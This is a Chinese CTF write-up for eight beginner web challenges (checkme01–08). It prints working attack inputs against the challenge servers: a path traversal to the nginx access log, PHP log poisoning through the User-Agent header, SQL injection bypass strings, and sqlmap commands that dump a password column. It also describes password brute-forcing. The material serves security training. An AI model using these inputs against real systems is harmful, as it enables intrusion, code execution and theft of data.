当前位置:首页 > CTF > 正文内容

Checkme1-8 WP

admin3年前 (2022-12-01)CTF99

checkme01

核心代码:$keys = base64_decode(urldecode($keys));

解题思路:需先对 “qsnctf” 字符进行 base64 编码,才能满足$keys=="qsnctf"的判断条件。

操作步骤:将编码后的内容输入,即可获取 flag。

checkme02

初始现象:打开页面后无明显内容。

尝试操作:在页面中尝试读取phpinfo();查看服务器信息。

解题关键:在phpinfo();输出结果中搜索 “qsnctf” 关键词,即可找到 flag。

checkme03

题目类型:文件包含漏洞利用。

初步尝试:使用?text=php://filter/read=convert.base64-encode/resource=index.php读取文件,发现该方法失效。

替代方案:尝试读取服务器日志文件,构造 payload:

?text=../../../../../../../../../../../../../../../../var/log/nginx/access.log

漏洞利用:从日志中发现会记录 User-Agent 信息,使用 HackBar 工具将 User-Agent 修改为<?php phpinfo();?>,刷新页面后执行代码。

获取 flag:执行后在页面输出中找到 flag。

checkme04

题目要求:需满足两个条件 —— 变量a为字母类型、变量b为数字类型,且两者的 MD5 值相等,即可输出 flag。

checkme05

题目类型:强类型比较(===)漏洞。

解题操作:根据强类型比较的特性,输入符合条件的参数,即可得到 flag。

checkme06

题目提示:给出一个列表(字典)数据,推测需通过爆破获取关键信息。

爆破技巧:对列表中的数据进行爆破,观察返回包长度,长度不同的返回包对应的内容即为密码(需自行完成爆破操作)。

获取 flag:输入爆破得到的密码,即可获取 flag。

checkme07

解题方法:使用 SQL 注入万能密码进行登录,直接获取 flag。

常见万能密码示例:' or 1=1#、admin' -- 等(根据题目实际情况选择合适的万能密码)。

checkme08

解题工具:SQLMap(自动化 SQL 注入工具)。

前置操作:将抓取到的 HTTP 请求包保存为1.txt文件。

步骤 1:爆破数据库

执行命令:

python sqlmap.py -r 1.txt --dbs

步骤 2:爆破表名

执行命令(指定数据库为sql):

python sqlmap.py -r 1.txt -D sql --tables

步骤 3:爆破列名

执行命令(指定表名为user):

python sqlmap.py -r 1.txt -D sql -T user --columns

步骤 4:读取 flag

执行命令(指定列名为password):

python sqlmap.py -r 1.txt -D sql -T user -C password --dump

获取 flag:在password列的 dump 结果中找到 flag。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=61

分享给朋友:

“Checkme1-8 WP” 的相关文章

南京邮电大学 CTF 两道隐写 Writeup【CTF 比赛】【CTF 题解】

南京邮电大学 CTF 两道隐写 Writeup【CTF 比赛】【CTF 题解】

作者:Szrzvdny | 墨是人性1:图种首先获取题目图片,如下所示:将图片文件复制到本地环境,准备后续分析:使用Binwalk工具对图片进行分析,可发现图片中隐藏了一个zip文件;直接使用foremost工具分离隐藏文件即可:分离完成后,在output目录中会生成对应的zip文件,解压该文件并点...

2017 ISG 管理运维赛(克拉玛依十三年团队)解题思路报告 V1.1

2017 ISG 管理运维赛(克拉玛依十三年团队)解题思路报告 V1.1

文档基础信息公司文档编号:SSN-17-09团队名称:克拉玛依 十三年(Karamay SSN)提交时间:2017 年 9 月声明本文档是高级中学十三年社团为 ISG 竞赛组委会、上海市信息安全行业协会提交的 ISG2017 解题文档,文档的所有权归十三年所有,任何对本文档的修改、发布、传播等行为都...

(原创)北京邮电大学网络空间安全 - 自主招生复试 CTF 题 wp

(原创)北京邮电大学网络空间安全 - 自主招生复试 CTF 题 wp

写在开头的话: 今年总共有三所院校自主招生里面提到了对网络空间安全特长生有高考优惠政策招生,分别是四川大学,北京邮电大学,中国科技大学。其中中国科技大学和北京邮电大学是降分到当地一本线录取,川大有三个等级,第一等级是降分到当地一本线录取,第二个等级是降分一本线下 30 分录取,第三个等级是破格录取,...

i 春秋 CTF 大本营 basic 部分 writeup

i 春秋 CTF 大本营 basic 部分 writeup

一、基础信息题目链接:https://www.ichunqiu.com/battalion二、题目解析1. 回旋 13 踢解题思路核心识别:题目中 “13” 是关键线索,对应ROT13 编码(凯撒密码的特殊形式,字母移位 13 位,A↔N、B↔O...Z↔M);解码规则:将字母按顺序移位 13 位,...

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

题目链接: https://www.ichunqiu.com/battalion1. 回旋 13 踢解题思路题目中 “13” 为关键提示,对应ROT13 编码(凯撒密码的特殊形式,字母循环移位 13 位,A↔N、B↔O...Z↔M),直接对密文进行 ROT13 解码即可得到 flag。编码规则ROT...

弱口令实验室招新赛 Writeup

弱口令实验室招新赛 Writeup

一、解题状况总览1. Web 类别签到小能手开胃菜小镇做题家DiscuzWeblogic2. MISC 类别签到Easymisc奇怪又不奇怪cookie 怎么分吉他Easyso3. Crypto 类别82.83.85SnakeCryptososbabyrsa RSbabyWhat奇怪又奇怪4. Re...